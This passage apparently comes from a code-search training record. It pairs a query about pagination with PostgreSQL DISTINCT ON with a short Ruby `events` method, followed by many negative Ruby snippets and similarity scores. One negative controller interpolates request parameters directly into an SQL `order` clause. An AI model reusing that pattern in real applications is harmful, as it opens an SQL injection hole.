if args.key?(:envelopepriority)\n @event = args[:event] if args.key?(:event)\n @exif4c = args[:exif4c] if args.key?(:exif4c)\n @exif_time = args[:exif_time] if args.key?(:exif_time)\n @exif_time_utc = args[:exif_time_utc] if args.key?(:exif_time_utc)\n @exif_time_utc_source = args[:exif_time_utc_source] if args.key?(:exif_time_utc_source)\n @expirationdate = args[:expirationdate] if args.key?(:expirationdate)\n @expirationtime = args[:expirationtime] if args.key?(:expirationtime)\n @exposurebias = args[:exposurebias] if args.key?(:exposurebias)\n @exposureindex = args[:exposureindex] if args.key?(:exposureindex)\n @exposurelockused = args[:exposurelockused] if args.key?(:exposurelockused)\n @exposuremode = args[:exposuremode] if args.key?(:exposuremode)\n @exposureprogram = args[:exposureprogram] if args.key?(:exposureprogram)\n @exposuretime = args[:exposuretime] if args.key?(:exposuretime)\n @extrasamples = args[:extrasamples] if args.key?(:extrasamples)\n @fillorder = args[:fillorder] if args.key?(:fillorder)\n @firmware = args[:firmware] if args.key?(:firmware)\n @firstphotodate = args[:firstphotodate] if args.key?(:firstphotodate)\n @fixtureidentifier = args[:fixtureidentifier] if args.key?(:fixtureidentifier)\n @flashcompensation = args[:flashcompensation] if args.key?(:flashcompensation)\n @flashenergy = args[:flashenergy] if args.key?(:flashenergy)\n @flashreturn = args[:flashreturn] if args.key?(:flashreturn)\n @flashused = args[:flashused] if args.key?(:flashused)\n @focallength = args[:focallength] if args.key?(:focallength)\n @focallengthin35mmfilm = args[:focallengthin35mmfilm] if args.key?(:focallengthin35mmfilm)\n @focalplaneunits = args[:focalplaneunits] if args.key?(:focalplaneunits)\n @focalplanexres = args[:focalplanexres] if args.key?(:focalplanexres)\n @format = args[:format] if args.key?(:format)\n @freebytecounts = args[:freebytecounts] if args.key?(:freebytecounts)\n @freeoffsets = args[:freeoffsets] if args.key?(:freeoffsets)\n @fullpanoheightpixels = args[:fullpanoheightpixels] if args.key?(:fullpanoheightpixels)\n @fullpanowidthpixels = args[:fullpanowidthpixels] if args.key?(:fullpanowidthpixels)\n @function = args[:function] if args.key?(:function)\n @gaincontrol = args[:gaincontrol] if args.key?(:gaincontrol)\n @gaudiomime = args[:gaudiomime] if args.key?(:gaudiomime)\n @gcameraburstid = args[:gcameraburstid] if args.key?(:gcameraburstid)\n @gcameraburstprimary = args[:gcameraburstprimary] if args.key?(:gcameraburstprimary)\n @gcameradisableautocreation = args[:gcameradisableautocreation] if args.key?(:gcameradisableautocreation)\n @gcameramicrovideo = args[:gcameramicrovideo] if args.key?(:gcameramicrovideo)\n @gcameramicrovideooffset = args[:gcameramicrovideooffset] if args.key?(:gcameramicrovideooffset)\n @gcameramicrovideopresentationtimestampus = args[:gcameramicrovideopresentationtimestampus] if args.key?(:gcameramicrovideopresentationtimestampus)\n @gcameramicrovideoversion = args[:gcameramicrovideoversion] if args.key?(:gcameramicrovideoversion)\n @gcameramotionphoto = args[:gcameramotionphoto] if args.key?(:gcameramotionphoto)\n @gcameramotionphotopresentationtimestampus = args[:gcameramotionphotopresentationtimestampus] if args.key?(:gcameramotionphotopresentationtimestampus)\n @gcameramotionphotoversion = args[:gcameramotionphotoversion] if args.key?(:gcameramotionphotoversion)\n @gcameraspecialtypeid = args[:gcameraspecialtypeid] if args.key?(:gcameraspecialtypeid)\n @gcreationscameraburstid = args[:gcreationscameraburstid] if args.key?(:gcreationscameraburstid)\n @gcreationstype = args[:gcreationstype] if args.key?(:gcreationstype)\n @gdepth_metadata = args[:gdepth_metadata] if args.key?(:gdepth_metadata)\n @gimagemime = args[:gimagemime] if args.key?(:gimagemime)\n @gpsdatestamp = args[:gpsdatestamp] if args.key?(:gpsdatestamp)\n @gpsdestbearing = args[:gpsdestbearing] if args.key?(:gpsdestbearing)\n @gpsdestbearingref = args[:gpsdestbearingref] if args.key?(:gpsdestbearingref)\n @gpsdestdistance = args[:gpsdestdistance] if args.key?(:gpsdestdistance)\n @gpsdestdistanceref = args[:gpsdestdistanceref] if args.key?(:gpsdestdistanceref)\n @gpsdestlatitude = args[:gpsdestlatitude] if args.key?(:gpsdestlatitude)\n @gpsdestlatituderef = args[:gpsdestlatituderef] if args.key?(:gpsdestlatituderef)\n @gpsdestlongitude = args[:gpsdestlongitude] if args.key?(:gpsdestlongitude)\n @gpsdestlongituderef = args[:gpsdestlongituderef] if args.key?(:gpsdestlongituderef)\n @gpsdifferential = args[:gpsdifferential] if args.key?(:gpsdifferential)\n @gpsdop = args[:gpsdop] if args.key?(:gpsdop)\n @gpsimgdirection = args[:gpsimgdirection] if args.key?(:gpsimgdirection)\n @gpsimgdirectionref = args[:gpsimgdirectionref] if args.key?(:gpsimgdirectionref)\n @gpsmapdatum = args[:gpsmapdatum] if args.key?(:gpsmapdatum)\n @gpsmeasuremode = args[:gpsmeasuremode] if args.key?(:gpsmeasuremode)\n @gpssatellites = args[:gpssatellites] if args.key?(:gpssatellites)\n @gpsspeed = args[:gpsspeed] if args.key?(:gpsspeed)\n @gpsspeedref = args[:gpsspeedref] if args.key?(:gpsspeedref)\n @gpsstatus = args[:gpsstatus] if args.key?(:gpsstatus)\n @gpstime = args[:gpstime] if args.key?(:gpstime)\n @gpstrack = args[:gpstrack] if args.key?(:gpstrack)\n @gpstrackref = args[:gpstrackref] if args.key?(:gpstrackref)\n @grayresponsecurve = args[:grayresponsecurve] if args.key?(:grayresponsecurve)\n @grayresponseunit = args[:grayresponseunit] if args.key?(:grayresponseunit)\n @has_alpha = args[:has_alpha] if args.key?(:has_alpha)\n @hdr_metadata = args[:hdr_metadata] if args.key?(:hdr_metadata)\n @headline = args[:headline] if args.key?(:headline)\n @height = args[:height] if args.key?(:height)\n @hostcomputer = args[:hostcomputer] if args.key?(:hostcomputer)\n @identifier = args[:identifier] if args.key?(:identifier)\n @imagenumber = args[:imagenumber] if args.key?(:imagenumber)\n @imageorientation = args[:imageorientation] if args.key?(:imageorientation)\n @imagetype = args[:imagetype] if args.key?(:imagetype)\n @initialhorizontalfovdegrees = args[:initialhorizontalfovdegrees] if args.key?(:initialhorizontalfovdegrees)\n @initialverticalfovdegrees = args[:initialverticalfovdegrees] if args.key?(:initialverticalfovdegrees)\n @initialviewheadingdegrees = args[:initialviewheadingdegrees] if args.key?(:initialviewheadingdegrees)\n @initialviewpitchdegrees = args[:initialviewpitchdegrees] if args.key?(:initialviewpitchdegrees)\n @initialviewrolldegrees = args[:initialviewrolldegrees] if args.key?(:initialviewrolldegrees)\n @instructions = args[:instructions] if args.key?(:instructions)\n @intellectualgenre = args[:intellectualgenre] if args.key?(:intellectualgenre)\n @interoperabilityindex = args[:interoperabilityindex] if args.key?(:interoperabilityindex)\n @iptc4c = args[:iptc4c] if args.key?(:iptc4c)\n @iptclastedited = args[:iptclastedited] if args.key?(:iptclastedited)\n @ismpformat = args[:ismpformat] if args.key?(:ismpformat)\n @isoequivalent = args[:isoequivalent] if args.key?(:isoequivalent)\n @keyword = args[:keyword] if args.key?(:keyword)\n @label = args[:label] if args.key?(:label)\n @language = args[:language] if args.key?(:language)\n @languageidentifier = args[:languageidentifier] if args.key?(:languageidentifier)\n @lastphotodate = args[:lastphotodate] if args.key?(:lastphotodate)\n @latitude = args[:latitude] if args.key?(:latitude)\n @lens = args[:lens] if args.key?(:lens)\n @lensid = args[:lensid] if args.key?(:lensid)\n @lensinfo = args[:lensinfo] if args.key?(:lensinfo)\n @lightsource = args[:lightsource] if args.key?(:lightsource)\n @location = args[:location] if args.key?(:location)\n @locationshown = args[:locationshown] if args.key?(:locationshown)\n @longitude = args[:longitude] if args.key?(:longitude)\n @marked = args[:marked] if args.key?(:marked)\n @maxaperturevalue = args[:maxaperturevalue] if args.key?(:maxaperturevalue)\n @maxavailheight = args[:maxavailheight] if args.key?(:maxavailheight)\n @maxavailwidth = args[:maxavailwidth] if args.key?(:maxavailwidth)\n @maxsamplevalue = args[:maxsamplevalue] if args.key?(:maxsamplevalue)\n @metadatadate = args[:metadatadate] if args.key?(:metadatadate)\n @meteringmode = args[:meteringmode] if args.key?(:meteringmode)\n @microvideooriginaloffset = args[:microvideooriginaloffset] if args.key?(:microvideooriginaloffset)\n @mime_type = args[:mime_type] if args.key?(:mime_type)\n @minormodelagedisclosure = args[:minormodelagedisclosure] if args.key?(:minormodelagedisclosure)\n @minsamplevalue = args[:minsamplevalue] if args.key?(:minsamplevalue)\n @mode = args[:mode] if args.key?(:mode)\n @modelage = args[:modelage] if args.key?(:modelage)\n @modelreleaseid = args[:modelreleaseid] if args.key?(:modelreleaseid)\n @modelreleasestatus = args[:modelreleasestatus] if args.key?(:modelreleasestatus)\n @modifydate = args[:modifydate] if args.key?(:modifydate)\n @motionphotovideodataboxheader = args[:motionphotovideodataboxheader] if args.key?(:motionphotovideodataboxheader)\n @nickname = args[:nickname] if args.key?(:nickname)\n @objectattributereference = args[:objectattributereference] if args.key?(:objectattributereference)\n @objectcycle = args[:objectcycle] if args.key?(:objectcycle)\n @objecttypereference = args[:objecttypereference] if args.key?(:objecttypereference)\n @offsettime = args[:offsettime] if args.key?(:offsettime)\n @offsettimedigitized = args[:offsettimedigitized] if args.key?(:offsettimedigitized)\n @offsettimeoriginal = args[:offsettimeoriginal] if args.key?(:offsettimeoriginal)\n @organisationinimagecode = args[:organisationinimagecode] if args.key?(:organisationinimagecode)\n @organisationinimagename = args[:organisationinimagename] if args.key?(:organisationinimagename)\n @orientation = args[:orientation] if args.key?(:orientation)\n @originatingprogram = args[:originatingprogram] if args.key?(:originatingprogram)\n @owner = args[:owner] if args.key?(:owner)\n @ownername = args[:ownername] if args.key?(:ownername)\n @panorama_metadata = args[:panorama_metadata] if args.key?(:panorama_metadata)\n @personinimage = args[:personinimage] if args.key?(:personinimage)\n @photometricinterpretation = args[:photometricinterpretation] if args.key?(:photometricinterpretation)\n @planarconfiguration = args[:planarconfiguration] if args.key?(:planarconfiguration)\n @poseheadingdegrees = args[:poseheadingdegrees] if args.key?(:poseheadingdegrees)\n @posepitchdegrees = args[:posepitchdegrees] if args.key?(:posepitchdegrees)\n @poserolldegrees = args[:poserolldegrees] if args.key?(:poserolldegrees)\n @primarychromaticities = args[:primarychromaticities] if args.key?(:primarychromaticities)\n @productid = args[:productid] if args.key?(:productid)\n @programversion = args[:programversion] if args.key?(:programversion)\n @projectiontype = args[:projectiontype] if args.key?(:projectiontype)\n @propertyreleaseid = args[:propertyreleaseid] if args.key?(:propertyreleaseid)\n @propertyreleasestatus = args[:propertyreleasestatus] if args.key?(:propertyreleasestatus)\n @publisher = args[:publisher] if args.key?(:publisher)\n @rating = args[:rating] if args.key?(:rating)\n @redeyemode = args[:redeyemode] if args.key?(:redeyemode)\n @referenceblackwhite = args[:referenceblackwhite] if args.key?(:referenceblackwhite)\n @referencedate = args[:referencedate] if args.key?(:referencedate)\n @referencenumber = args[:referencenumber] if args.key?(:referencenumber)\n @referenceservice = args[:referenceservice] if args.key?(:referenceservice)\n @relatedimagefileformat = args[:relatedimagefileformat] if args.key?(:relatedimagefileformat)\n @relatedimageheight = args[:relatedimageheight] if args.key?(:relatedimageheight)\n @relatedimagewidth = args[:relatedimagewidth] if args.key?(:relatedimagewidth)\n @relatedsoundfile = args[:relatedsoundfile] if args.key?(:relatedsoundfile)\n @relation = args[:relation] if args.key?(:relation)\n @releasedate = args[:releasedate] if args.key?(:releasedate)\n @releasetime = args[:releasetime] if args.key?(:releasetime)\n @resolutionunit = args[:resolutionunit] if args.key?(:resolutionunit)\n @rotate = args[:rotate] if args.key?(:rotate)\n @rowsperstrip = args[:rowsperstrip] if args.key?(:rowsperstrip)\n @samplesperpixel = args[:samplesperpixel] if args.key?(:samplesperpixel)\n @saturation = args[:saturation] if args.key?(:saturation)\n @scene = args[:scene] if args.key?(:scene)\n @scenecapturetype = args[:scenecapturetype] if args.key?(:scenecapturetype)\n @sensingmethod = args[:sensingmethod] if args.key?(:sensingmethod)\n @sensorheight = args[:sensorheight] if args.key?(:sensorheight)\n @sensorwidth = args[:sensorwidth] if args.key?(:sensorwidth)\n @serialnumber = args[:serialnumber] if args.key?(:serialnumber)\n @serviceidentifier = args[:serviceidentifier] if args.key?(:serviceidentifier)\n @sharpness = args[:sharpness] if args.key?(:sharpness)\n @shutterspeedvalue = args[:shutterspeedvalue] if args.key?(:shutterspeedvalue)\n @software = args[:software] if args.key?(:software)\n @source = args[:source] if args.key?(:source)\n @sourcephotoscount = args[:sourcephotoscount] if args.key?(:sourcephotoscount)\n @spectralsensitivity = args[:spectralsensitivity] if args.key?(:spectralsensitivity)\n @state = args[:state] if args.key?(:state)\n @stitchingsoftware = args[:stitchingsoftware] if args.key?(:stitchingsoftware)\n @stripbytecounts = args[:stripbytecounts] if args.key?(:stripbytecounts)\n @stripoffsets = args[:stripoffsets] if args.key?(:stripoffsets)\n @subjectarea = args[:subjectarea] if args.key?(:subjectarea)\n @subjectcode = args[:subjectcode] if args.key?(:subjectcode)\n @subjectdistancerange = args[:subjectdistancerange] if args.key?(:subjectdistancerange)\n @subjectlocation = args[:subjectlocation] if args.key?(:subjectlocation)\n @subjectreference = args[:subjectreference] if args.key?(:subjectreference)\n @sublocation = args[:sublocation] if args.key?(:sublocation)\n @subsectime = args[:subsectime] if args.key?(:subsectime)\n @subsectimedigitized = args[:subsectimedigitized] if args.key?(:subsectimedigitized)\n @subsectimeoriginal = args[:subsectimeoriginal] if args.key?(:subsectimeoriginal)\n @supplementalcategory = args[:supplementalcategory] if args.key?(:supplementalcategory)\n @thresholding = args[:thresholding] if args.key?(:thresholding)\n @thumbnailer_build_cl = args[:thumbnailer_build_cl] if args.key?(:thumbnailer_build_cl)\n @timesent = args[:timesent] if args.key?(:timesent)\n @timezoneminutes = args[:timezoneminutes] if args.key?(:timezoneminutes)\n @timezoneoffset = args[:timezoneoffset] if args.key?(:timezoneoffset)\n @title = args[:title] if args.key?(:title)\n @transmissionreference = args[:transmissionreference] if args.key?(:transmissionreference)\n @type = args[:type] if args.key?(:type)\n @uniqueid = args[:uniqueid] if args.key?(:uniqueid)\n @uno = args[:uno] if args.key?(:uno)\n @urgency = args[:urgency] if args.key?(:urgency)\n @url = args[:url] if args.key?(:url)\n @usageterms = args[:usageterms] if args.key?(:usageterms)\n @usepanoramaviewer = args[:usepanoramaviewer] if args.key?(:usepanoramaviewer)\n @version = args[:version] if args.key?(:version)\n @webstatement = args[:webstatement] if args.key?(:webstatement)\n @whitebalance = args[:whitebalance] if args.key?(:whitebalance)\n @whitepoint = args[:whitepoint] if args.key?(:whitepoint)\n @width = args[:width] if args.key?(:width)\n @xmp4c = args[:xmp4c] if args.key?(:xmp4c)\n @xresolution = args[:xresolution] if args.key?(:xresolution)\n @ycbcrcoefficients = args[:ycbcrcoefficients] if args.key?(:ycbcrcoefficients)\n @ycbcrpositioning = args[:ycbcrpositioning] if args.key?(:ycbcrpositioning)\n @ycbcrsubsampling = args[:ycbcrsubsampling] if args.key?(:ycbcrsubsampling)\n @yresolution = args[:yresolution] if args.key?(:yresolution)\n end",
"def update!(**args)\n @bounding_poly = args[:bounding_poly] if args.key?(:bounding_poly)\n @confidence = args[:confidence] if args.key?(:confidence)\n @orientation = args[:orientation] if args.key?(:orientation)\n @text_anchor = args[:text_anchor] if args.key?(:text_anchor)\n end",
"def update_attributes(attrs)\n difference = attrs.keys - ASSIGNABLE\n if difference.empty?\n attributes.merge!(attrs)\n else\n raise \"unexpected attributes #{difference} for #{@node.path}\"\n end\n end",
"def attributes(*attrs)\n if attrs.size > 0\n attrs.each{|attr| attribute attr}\n end\n @attributes ||= []\n end",
"def update_attr_with_ial(attr, ial); end",
"def update!(**args)\n @confidence_threshold = args[:confidence_threshold] if args.key?(:confidence_threshold)\n @f1_score = args[:f1_score] if args.key?(:f1_score)\n @precision = args[:precision] if args.key?(:precision)\n @recall = args[:recall] if args.key?(:recall)\n end",
"def update!(**args)\n @confidence_threshold = args[:confidence_threshold] if args.key?(:confidence_threshold)\n @f1_score = args[:f1_score] if args.key?(:f1_score)\n @precision = args[:precision] if args.key?(:precision)\n @recall = args[:recall] if args.key?(:recall)\n end",
"def update!(**args)\n @confidence_threshold = args[:confidence_threshold] if args.key?(:confidence_threshold)\n @f1_score = args[:f1_score] if args.key?(:f1_score)\n @precision = args[:precision] if args.key?(:precision)\n @recall = args[:recall] if args.key?(:recall)\n end",
"def update!(**args)\n @devices = args[:devices] if args.key?(:devices)\n @low_confidence_reason = args[:low_confidence_reason] if args.key?(:low_confidence_reason)\n @result_confidence_level = args[:result_confidence_level] if args.key?(:result_confidence_level)\n end",
"def attr_set_ub1(attr_type, attr_value)\n #This is a stub, used for indexing\n end"
] |
[
"0.56544054",
"0.55829805",
"0.54594475",
"0.5393491",
"0.53762305",
"0.53650975",
"0.5343607",
"0.53413194",
"0.5340676",
"0.5314551",
"0.52878195",
"0.52488434",
"0.5241535",
"0.5241535",
"0.5241535",
"0.5241535",
"0.52374434",
"0.5222989",
"0.5191321",
"0.51482415",
"0.5139337",
"0.5130463",
"0.5127423",
"0.5127423",
"0.51151866",
"0.5114251",
"0.50946224",
"0.5079683",
"0.5071826",
"0.5066055",
"0.5059038",
"0.5052428",
"0.5046401",
"0.5045636",
"0.5045267",
"0.5044739",
"0.50391054",
"0.50360554",
"0.50324625",
"0.49841398",
"0.49819756",
"0.49733967",
"0.49690604",
"0.49530774",
"0.4937246",
"0.4935687",
"0.49325368",
"0.49280098",
"0.49272668",
"0.49249175",
"0.49234805",
"0.4916887",
"0.4916887",
"0.49099466",
"0.49089584",
"0.49081978",
"0.49076",
"0.4904821",
"0.49044117",
"0.4903292",
"0.4903292",
"0.4899585",
"0.48942068",
"0.4884563",
"0.48840442",
"0.48825473",
"0.4881596",
"0.4875226",
"0.48732978",
"0.48704112",
"0.48668304",
"0.4865016",
"0.48647627",
"0.48603073",
"0.4853664",
"0.48507464",
"0.48495448",
"0.48340183",
"0.48123083",
"0.48102814",
"0.4808742",
"0.48022538",
"0.47985113",
"0.47985113",
"0.4796122",
"0.47884014",
"0.4786589",
"0.4783268",
"0.47828484",
"0.47803771",
"0.47748858",
"0.47739354",
"0.4765524",
"0.4765483",
"0.47629264",
"0.47535536",
"0.47533515",
"0.47533515",
"0.47533515",
"0.4741946",
"0.47402596"
] |
0.0
|
-1
|
Main method for results. We are using additional wrapper to mitigate Kaminari / RoR problems with PostgreSQL DISTINCT ON (pagination is broken without this)
|
def events
RoyalEvent::Event.where(
"id IN (#{subquery.to_sql})"
).order(default_order)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def index\n #@data = Datum.all\n @q = Datum.search(params[:q])\n @data = @q.result(distinct: true).page(params[:page]).per(20)\n end",
"def index\n @q = User.search(params[:q])\n @users = @q.result(:distinct => true).order(sort_column + ' ' + sort_direction).paginate(:page => params[:page])\n# @users = User.order(sort_column + ' ' + sort_direction).paginate(:per_page => 10, :page => params[:page])\n @q.build_condition\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @users }\n end\n end",
"def get_list_of_records(klass, options = {}, &block)\n items = klass.name.tableize\n self.current_page = options[:page] if options[:page]\n query = options[:query] if options[:query]\n category = options[:category] if options[:category]\n pagination = options[:pagination].nil? ? true : options[:pagination] \n date = options[:date] if options[:date]\n #date_range = options[:date_range] if options[:date_range]\n start_date = options[:start_date] if options[:start_date]\n end_date = options[:end_date] if options[:end_date]\n sort_fields = options[:sort] if options[:sort]\n sort_dir = options[:dir] || \"ASC\"\n per_page = options[:per_page] if options[:per_page]\n\n #self.current_query = options\n records = {\n :user => @current_user #,\n # :order => @current_user.pref[:\"#{items}_sort_by\"] || klass.sort_by\n }\n\n # Use default processing if no hooks are present. Note that comma-delimited\n # export includes deleted records, and the pagination is enabled only for\n # plain HTTP, Ajax and XML API requests.\n wants = request.format\n filter = session[options[:filter]].to_s.split(',') if options[:filter]\n scope = klass.scoped\n scope = scope.category(category) if category.present?\n scope = scope.state(filter) if filter.present?\n scope = scope.search(query) if query.present?\n scope = scope.at_date(date) if date.present?\n #scope = scope.between_dates(date_range) if date_range.present?\n scope = scope.between_dates(start_date, end_date) if (start_date.present? && end_date.present?)\n\n if sort_fields.present?\n words = sort_fields.split(\".\")\n if words.length > 1\n table = words.shift.tableize # popup first item\n field = words.join(\".\")\n sort_fields2 = \"#{table}.#{field}\" \n else\n sort_fields2 = \"#{items}.#{words.first}\"\n end\n scope = scope.order_by(sort_fields2, sort_dir)\n end\n\n scope = yield scope if block_given?\n scope = scope.unscoped if wants.csv?\n scope = scope.page(current_page).per(per_page)\n scope\n end",
"def paginator; end",
"def index\n @search = Ad.search(params[:q])\n @result = @search.result\n @ads = @result.order('created_at DESC').distinct\n @ads = @result.page(params[:page]).per(15)\n\n respond_to do |format|\n format.html\n end\n end",
"def playing_with(num=10)\n return [] if not page_id or page_id==0\n \nsql = <<-SQL\n select terms.*\n from terms, matches matches1,matches matches2 \n where terms.id=matches2.term_id \n and matches2.page_id=matches1.page_id \n and matches1.date_for_sorting = matches2.date_for_sorting\n and matches1.id=#{id}\n and matches2.id<>#{id}\n and matches2.status='notified'\n group by terms.text\n limit #{num}\n SQL\n terms = Term.find_by_sql(sql) \n Term.uniques(terms)\n end",
"def index\n @products = Product.all\n\n # @search = Product.search(params[:q])\n # @products = @search.result(distinct: true)\n\n # @search = Product.search(params[:q])\n # @products = @search.result(:distinct => true).paginate(:page => params[:page], :per_page=>100)\n \n #@product = Product.new \n # @search = Article.search(params[:search])\n # @articles = @search.all\n end",
"def index\n user_works = Work.joins(:pseuds => :user).where(\"users.id = ?\", @user.id)\n work_query = user_works.joins(:taggings).\n joins(\"inner join tags on taggings.tagger_id = tags.id AND tags.type = 'Fandom'\").\n select(\"distinct tags.name as fandom, \n works.id as id, \n works.title as title, \n works.revised_at as date,\n works.word_count as word_count\")\n\n # sort \n \n # NOTE: Because we are going to be eval'ing the @sort variable later we MUST make sure that its content is \n # checked against the whitelist of valid options\n sort_options = \"\"\n @sort = \"\"\n if current_user.preference.hide_hit_counts\n sort_options = %w(kudos.count comments.count bookmarks.count subscriptions.count word_count)\n @sort = sort_options.include?(params[:sort_column]) ? params[:sort_column] : \"kudos.count\"\n else\n sort_options = %w(hits date kudos.count comments.count bookmarks.count subscriptions.count word_count)\n @sort = sort_options.include?(params[:sort_column]) ? params[:sort_column] : \"hits\"\n end\n \n @dir = params[:sort_direction] == \"ASC\" ? \"ASC\" : \"DESC\"\n params[:sort_column] = @sort\n params[:sort_direction] = @dir\n\n # gather works and sort by specified count\n @years = [\"All Years\"] + user_works.value_of(:revised_at).map {|date| date.year.to_s}.uniq.sort\n @current_year = @years.include?(params[:year]) ? params[:year] : \"All Years\"\n if @current_year != \"All Years\"\n start_date = DateTime.parse(\"01/01/#{@current_year}\")\n end_date = DateTime.parse(\"31/12/#{@current_year}\")\n work_query = work_query.where(\"works.revised_at >= ? AND works.revised_at <= ?\", start_date, end_date)\n end\n # NOTE: eval is used here instead of send only because you can't send \"bookmarks.count\" -- avoid eval\n # wherever possible and be extremely cautious of its security implications (we whitelist the contents of\n # @sort above, so this should never contain potentially dangerous user input)\n works = work_query.all.sort_by {|w| @dir == \"ASC\" ? (eval(\"w.#{@sort}\") || 0) : (0 - (eval(\"w.#{@sort}\") || 0).to_i)} \n\n # on the off-chance a new user decides to look at their stats and have no works\n if works.blank?\n render \"no_stats\" and return\n end\n \n # group by fandom or flat view\n if params[:flat_view]\n @works = {ts(\"All Fandoms\") => works.uniq}\n else\n @works = works.group_by(&:fandom)\n end\n \n # gather totals for all works\n @totals = {}\n (sort_options - [\"date\"]).each do |value|\n # see explanation above about the eval here\n # the inject is used to collect the sum in the \"result\" variable as we iterate over all the works\n @totals[value.split(\".\")[0].to_sym] = works.uniq.inject(0) {|result, work| result + (eval(\"work.#{value}\") || 0)} # sum the works\n end\n @totals[:author_subscriptions] = Subscription.where(:subscribable_id => @user.id, :subscribable_type => 'User').count\n\n # graph top 5 works\n @chart_data = GoogleVisualr::DataTable.new \n @chart_data.new_column('string', 'Title')\n chart_col = @sort == \"date\" ? \"hits\" : @sort\n chart_col_title = chart_col.split(\".\")[0].titleize == \"Comments\" ? ts(\"Comment Threads\") : chart_col.split(\".\")[0].titleize\n chart_title = @sort == \"date\" ? ts(\"Most Recent\") : ts(\"Top Five By #{chart_col_title}\")\n @chart_data.new_column('number', chart_col_title)\n \n # Add Rows and Values \n # see explanation above about the eval here\n @chart_data.add_rows(works.uniq[0..4].map {|w| [w.title, eval(\"w.#{chart_col}\")]})\n\n # image version of bar chart\n # opts from here: http://code.google.com/apis/chart/image/docs/gallery/bar_charts.html\n @image_chart = GoogleVisualr::Image::BarChart.new(@chart_data, {:isVertical => true}).uri({\n :chtt => chart_title,\n :chs => \"800x350\",\n :chbh => \"a\",\n :chxt => \"x\",\n :chm => \"N,000000,0,-1,11\"\n })\n\n @chart = GoogleVisualr::Interactive::ColumnChart.new(@chart_data, :title => chart_title)\n \n end",
"def index\n @limit = params[:limit] || 200\n @page = params[:page] || 1\n \n @publications = Publication.active\n\n if params[:themes]\n #@publications = @publications.where(:themes => )\n end\n\n if valid? :keyword\n sql = Keyword.subquery(params[:keyword].split(/\\s+/))\n #@publications = @publications.where(\"#{Publication.table_name}.citation_id IN (#{sql})\")\n##{Publication.table_name}.citation_id IN (#{sql}) \n params[:keyword].split(/\\s+/).each do |word|\n @publications = @publications.where(\n \"lower(keywords) like ? OR lower(authors) LIKE ? OR lower(title) LIKE ?\", \"%#{word.downcase}%\", \"%#{word.downcase}%\", \"%#{word.downcase}%\")\n end\n end\n\n if valid? :themes\n sql = Keyword.theme_subquery(params[:themes])\n @publications = @publications.where(\"#{Publication.table_name}.citation_id IN (#{sql})\")\n end\n\n quads = params[:quadrangles].map {|v| v.empty? ? nil : v }.compact if params[:quadrangles]\n unless quads.nil? or quads.empty?\n sql = QuadrangleSearch.subquery(:all, params[:quadrangles])\n @publications = @publications.where(\"#{Publication.table_name}.citation_id IN (#{sql})\")\n end\n\n unless params[:agency].nil? or params[:agency].empty?\n @publications = @publications.where(\"LOWER(#{Publication.table_name}.publisher) = ?\", params[:agency].downcase)\n end\n\n unless params[:year_from].nil? or params[:year_from].empty?\n @publications = @publications.where(\"publication_year >= ?\", params[:year_from])\n end\n\n unless params[:year_to].nil? or params[:year_to].empty?\n @publications = @publications.where(\"publication_year <= ?\", params[:year_to])\n end\n\n if valid? :scale_from\n @publications = @publications.where(\"#{Outline.table_name}.map_scale_denominator >= ?\", params[:scale_from].to_i)\n end\n if valid? :scale_to\n @publications = @publications.where(\"#{Outline.table_name}.map_scale_denominator <= ?\", params[:scale_to].to_i)\n end\n\n unless (valid? :statewide and params[:statewide] == 'on')\n logger.info \"Include statewide\"\n @publications = @publications.where(\"#{Outline.table_name}.outline_source IN (?)\", ['Map Extent', 'Map Outline'])\n end\n\n unless params[:aoi_geographic].blank?\n @aoi_geographic = GeoRuby::SimpleFeatures::Polygon.from_ewkt(params[:aoi_geographic])\n @aoi_geographic.srid = 4326;\n @bounds = @aoi_geographic.envelope\n end\n\n unless params[:aoi].blank?\n @aoi = GeoRuby::SimpleFeatures::Polygon.from_ewkt(params[:aoi])\n @aoi.srid = 3338;\n\n @publications = @publications.where(\n \"SDO_RELATE(#{Outline.table_name}.geometry, #{@aoi.as_sdo_rectangle}, 'mask=ANYINTERACT querytype = WINDOW') = 'TRUE'\"\n )\n end\n\n @selected = params[:selected].split(',').map(&:to_i) unless params[:selected].blank?\n if @selected and params[:selected_only]\n @publications = @publications.where(:citation_id => @selected)\n end\n \n unless params[:sort].blank?\n @publications = @publications.order(\"#{params[:sort]} #{params[:dir]}\")\n end\n\n respond_to do |format|\n format.pdf do\n render :pdf => 'publications', \n :layout => 'pdf.html', \n :footer => {\n :left => \"Generated: #{Time.now.strftime('%F %T')}\", \n :right => '[page]/[toPage]',\n :line => true\n }\n end\n format.all do\n @publications = @publications.paginate(:page => @page, :per_page => @limit)\n end\n end\n end",
"def index\n\n # gather data for pull down lists\n @collections = Collection.select_list\n @periods = Period.select_list\n @genres = Subject.genres.where(['subject_translations.locale=?', :en.to_s]).order('subject_translations.name')\n \n @page = params[:page] || 1\n @per_page = params[:per_page] || Item.per_page || 100\n\n @sort_field = params[:c] ||= 'items.id'\n @order = sort_order('items.id') unless @sort_field == 'title_en' || @sort_field == 'title_fa'\n\n # look for filters\n @keyword_filter = params[:keyword_filter] unless params[:keyword_filter] == I18n.translate(:search_prompt)\n @collection_filter = params[:collection_filter]\n @period_filter = params[:period_filter]\n @genre_filter = params[:genre_filter]\n\n # unless @keyword_filter.nil? && @collection_filter.nil? && period_filer.nil? && subject_type_filter.nil?\n\n @query_hash = { :conditions => [], :parameters => { } }\n @query_hash = build_collection_query(@collection_filter, @query_hash) unless @collection_filter.nil? || @collection_filter == 'all'\n @query_hash = build_period_query(@period_filter, @query_hash) unless @period_filter.nil? || @period_filter == 'all'\n # @query_hash = build_person_query(@person_filter, @query_hash) unless @person_filter.nil? || @person_filter == 'all'\n # @query_hash = build_subject_query(@subject_filter, @query_hash) unless @subject_filter.nil? || @subject_filter == 'all'\n # @query_hash = build_place_query(@place_filter, @query_hash) unless @place_filter.nil? || @place_filter == 'all'\n @query_hash = build_genre_query(@genre_filter, @query_hash) unless @genre_filter.nil? || @genre_filter == 'all'\n @query_hash = build_keyword_query(@keyword_filter, @query_hash) unless @keyword_filter.blank? || @keyword_filter == I18n.translate(:search_prompt)\n\n # assemble the query from the two sql injection safe parts\n @query_conditions = ''\n @query_hash[:conditions].each do |condition|\n @query_conditions += (@query_conditions.blank? ? '': ' AND ') + condition\n end\n\n @query = [@query_conditions, @query_hash[:parameters]]\n\n @items = Item.where(@query).order(@order)\n\n @items = sort_bilingual(@items, 